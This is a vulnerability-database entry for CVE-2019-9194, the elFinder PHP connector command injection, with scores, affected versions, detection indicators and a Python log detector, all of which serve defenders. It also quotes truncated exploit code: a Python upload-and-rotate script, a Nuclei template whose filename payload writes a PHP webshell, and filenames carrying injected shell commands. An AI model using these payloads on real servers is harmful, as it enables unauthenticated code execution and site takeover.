CVE-2019-9194
Published 2019-02-26.
Priority P1 (90), critical, CVSS 3.0 base score 9.8. Exploited in the wild (VulnCheck KEV, initial access). EPSS 96.63% (99.9th percentile).
elFinder before 2.1.48 has a command injection vulnerability in the PHP connector.
Affected
2 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| std42 | elfinder | < 2.1.48 | 2.1.48 |
| studio-42 | elfinder | >= 0 < 2.1.48 | 2.1.48 |
Detection & IOCs (extracted from sources)
- Command: upload cmd with a multipart filename containing semicolons or other shell metacharacters, e.g. SecSignal.jpg;echo <cmd>
- Command: GET /php/connector.minimal.php?target=<hash>&degree=180&mode=rotate&cmd=resize
- Detect unauthenticated POST requests to /php/connector.minimal.php with multipart filenames containing semicolons or shell metacharacters, indicating command injection via the filename parameter.
- Detect GET requests to /php/connector.minimal.php with query parameters cmd=resize, mode=rotate, and degree=180 immediately following a suspicious file upload; this is the trigger step for the exiftran command injection.
- Alert on creation of new .php files in the elFinder /php/ directory or the /wp-content/plugins/wp-file-manager/lib/files path, as the exploit drops a PHP webshell there.
- Monitor for the exiftran process being spawned by the web server user with filenames containing semicolons, pipes, or base64-encoded payloads in the argument list.
- Check for requests to /php/connector.minimal.php returning HTTP 200 with a JSON body containing 'added' and 'hash' fields from unauthenticated clients; this confirms successful exploitation of the upload step.
- The PHP connector is not enabled by default; presence of an accessible connector.minimal.php is itself an indicator of misconfiguration and exploitability.
- The vulnerability is only exploitable if the PHP connector (connector.minimal.php) is enabled and accessible; it is not enabled by default in elFinder.
- Exploitation requires the `exiftran` utility to be installed and available in $PATH on the target system; without it, the vulnerable code path is not reached.
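As an added example (not code from any of the sources on this page), a small Python detector that applies the two request-level indicators above to constructed request records: it flags connector uploads whose multipart filename carries shell metacharacters, then correlates a later cmd=resize&mode=rotate request from the same client as the exiftran trigger step. The record layout, the sample IPs and the filenames are assumptions.

```python
import re
from urllib.parse import urlparse, parse_qs

CONNECTOR = "connector.minimal.php"
# Characters that let a filename break out of a shell command line.
SHELL_METACHARS = re.compile(r"[;|&`$(){}<>\n]")

# Constructed sample request records (assumed layout, not real traffic):
# (client IP, method, request target, multipart upload filename or None).
SAMPLE_REQUESTS = [
    ("203.0.113.5", "POST", "/php/connector.minimal.php", "SecSignal.jpg;echo test"),
    ("203.0.113.5", "GET", "/php/connector.minimal.php?target=l1_abc&degree=180&mode=rotate&cmd=resize", None),
    ("198.51.100.7", "POST", "/php/connector.minimal.php", "holiday.jpg"),
    ("198.51.100.7", "GET", "/php/connector.minimal.php?target=l1_def&degree=180&mode=rotate&cmd=resize", None),
]


def suspicious_filename(name):
    """True when an upload filename contains shell metacharacters."""
    return name is not None and SHELL_METACHARS.search(name) is not None


def is_rotate_trigger(target):
    """True when the query is the rotate request that reaches exiftran
    (cmd=resize with mode=rotate); degree is reported but not required."""
    q = parse_qs(urlparse(target).query)
    return q.get("cmd") == ["resize"] and q.get("mode") == ["rotate"]


def analyse(requests):
    """Return (ip, alert, detail) tuples. The trigger alert only fires for a
    client that already sent a suspicious upload, so benign rotations of
    cleanly named images stay quiet."""
    alerts = []
    tainted = set()  # clients seen uploading a metacharacter filename
    for ip, method, target, filename in requests:
        if not urlparse(target).path.endswith(CONNECTOR):
            continue
        if method == "POST" and suspicious_filename(filename):
            tainted.add(ip)
            alerts.append((ip, "suspicious_upload", filename))
        elif method == "GET" and ip in tainted and is_rotate_trigger(target):
            alerts.append((ip, "exiftran_trigger_after_upload", target))
    return alerts


if __name__ == "__main__":
    for alert in analyse(SAMPLE_REQUESTS):
        print(alert)
```

In a real deployment the filename would come from WAF or reverse-proxy body inspection, since access logs do not record multipart field contents.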
CVSS provenance
- NVD, CVSS v3.0: 9.8 CRITICAL (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H)
- NVD, CVSS v2.0: 7.5 HIGH (AV:N/AC:L/Au:N/C:P/I:P/A:P)
- VulnCheck: 9.8 CRITICAL
OSV
osv · 2022-05-13 · CVE-2019-9194 [CRITICAL]
elFinder command injection vulnerability in the PHP connector
elFinder before 2.1.48 has a command injection vulnerability in the PHP connector.
GHSA
ghsa · 2022-05-13 · CVE-2019-9194 [CRITICAL] · CWE-78
elFinder command injection vulnerability in the PHP connector
elFinder before 2.1.48 has a command injection vulnerability in the PHP connector.
VulnCheck
vulncheck · 2019 · CVSS 9.8 · CVE-2019-9194 [CRITICAL]
std42 elfinder Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection')
elFinder before 2.1.48 has a command injection vulnerability in the PHP connector.
Affected: std42 elfinder
Required Action: Apply remediations or mitigations per vendor instructions or discontinue use of the product if remediation or mitigations are unavailable.
Exploitation References: https://www.imperva.com/blog/crimeops-of-the-kashmirblack-botnet-part-ii/
Exploit PoC: https://vulncheck.com/xdb/2ddd39e09a2d
No detection rules found.
Exploit-DB
exploitdb · 2019-03-13 · CVE-2019-9194
elFinder PHP Connector < 2.1.48 - 'exiftran' Command Injection (Metasploit)

```ruby
'Name'        => 'elFinder PHP Connector exiftran Command Injection',
'Description' => %q{
  This module exploits a command injection vulnerability in elFinder
  versions prior to 2.1.48.

  The PHP connector component allows unauthenticated users to upload
  files and perform file modification operations, such as resizing and
  rotation of an image. The file name of uploaded files is not validated,
  allowing shell metacharacters.

  When performing image operations on JPEG files, the filename is passed
  to the `exiftran` utility without appropriate sanitization, causing
  shell commands in the file name to be executed, resulting in remote
  command injection as the web server user.

  The PHP connector is not enabled by default.

  The system must have `exiftran` installed and in `$PATH`.

  This module ha
```
Exploit-DB
exploitdb · 2019-03-04 · CVSS 9.8 · CVE-2019-9194 [CRITICAL]
elFinder 2.1.47 - 'PHP connector' Command Injection

```python
#!/usr/bin/python
'''
# Exploit Title: elFinder 2.1.47 - 'PHP connector' Command Injection
'''
# [...] SecSignal.php;echo SecSignal.jpg'

def usage():
    if len(sys.argv) != 2:
        print "Usage: python exploit.py [URL]"
        sys.exit(0)

def upload(url, payload):
    files = {'upload[]': (payload, open('SecSignal.jpg', 'rb'))}
    data = {"reqid" : "1693222c439f4", "cmd" : "upload", "target" : "l1_Lw", "mtime[]" : "1497726174"}
    r = requests.post("%s/php/connector.minimal.php" % url, files=files, data=data)
    j = json.loads(r.text)
    return j['added'][0]['hash']

def imgRotate(url, hash):
    r = requests.get("%s/php/connector.minimal.php?target=%s&width=539&height=960&degree=180&quality=100&bg=&mode=rotate&cmd=resize&reqid=169323550af10c" % (url, hash))
    return r.text

def shell(url):
    r = requests.get(
```
Nuclei
nuclei · CVSS 9.8 · CVE-2019-9194 [CRITICAL]
elFinder <= 2.1.47 - Command Injection

```yaml
payload: "{{rand_string}}.jpeg;echo {{base64(php_cmd)}} | base64 -d > {{file_name}}.php;echo {{rand_string}}.jpeg"
flow: http(1) && http(2) && http(3)
http:
  - raw:
      - |
        POST /php/connector.minimal.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: multipart/form-data; boundary=----WebKitFormBoundary7MA4YWxkTrZu0gW

        ------WebKitFormBoundary7MA4YWxkTrZu0gW
        Content-Disposition: form-data; name="cmd"

        upload
        ------WebKitFormBoundary7MA4YWxkTrZu0gW
        Content-Disposition: form-data; name="target"

        l1_Lw
        ------WebKitFormBoundary7MA4YWxkTrZu0gW
        Content-Disposition: form-data; name="upload[]"; filename="{{payload}}"
        Content-Type: image/jpeg

        {{hex_decode("ffd8ffe000104a46494600010101006000600000ffed003850686f746f73686f7020332e30003842494d040400000000001c1c027400101c020000020004fffe003b43524541
```
Metasploit
metasploit · elFinder PHP Connector exiftran Command Injection
This module exploits a command injection vulnerability in elFinder versions prior to 2.1.48. The PHP connector component allows unauthenticated users to upload files and perform file modification operations, such as resizing and rotation of an image. The file name of uploaded files is not validated, allowing shell metacharacters. When performing image operations on JPEG files, the filename is passed to the `exiftran` utility without appropriate sanitization, causing shell commands in the file name to be executed, resulting in remote command injection as the web server user. The PHP connector is not enabled by default. The system must have `exiftran` installed and in `$PATH`. This module has been tested successfully on elFinder versions 2.1
References
- https://github.com/Studio-42/elFinder/blob/master/README.md
- https://github.com/Studio-42/elFinder/compare/6884c4f...0740028
- https://github.com/Studio-42/elFinder/releases/tag/2.1.48
- https://www.exploit-db.com/exploits/46481/
- https://www.exploit-db.com/exploits/46539/